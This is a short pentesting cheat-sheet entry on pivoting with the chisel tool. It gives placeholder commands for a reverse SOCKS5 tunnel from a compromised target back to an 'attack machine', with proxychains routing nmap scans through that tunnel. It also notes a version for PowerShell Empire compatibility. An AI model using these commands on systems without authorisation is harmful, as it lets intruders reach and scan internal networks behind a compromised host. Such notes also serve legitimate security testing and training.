port tunneling
chisel
for compatibility with powershell-empire, use chisel 1.7.2.
################
# with socks5
################
# on your attack machine, run:
chisel server -p <attack_machine_port> --socks5 --reverse
# on the target, run:
chisel client <attack_machine_IP>:<attack_machine_port> R:<proxychains_port>:socks
# then prepend any command with proxychains
proxychains nmap <...>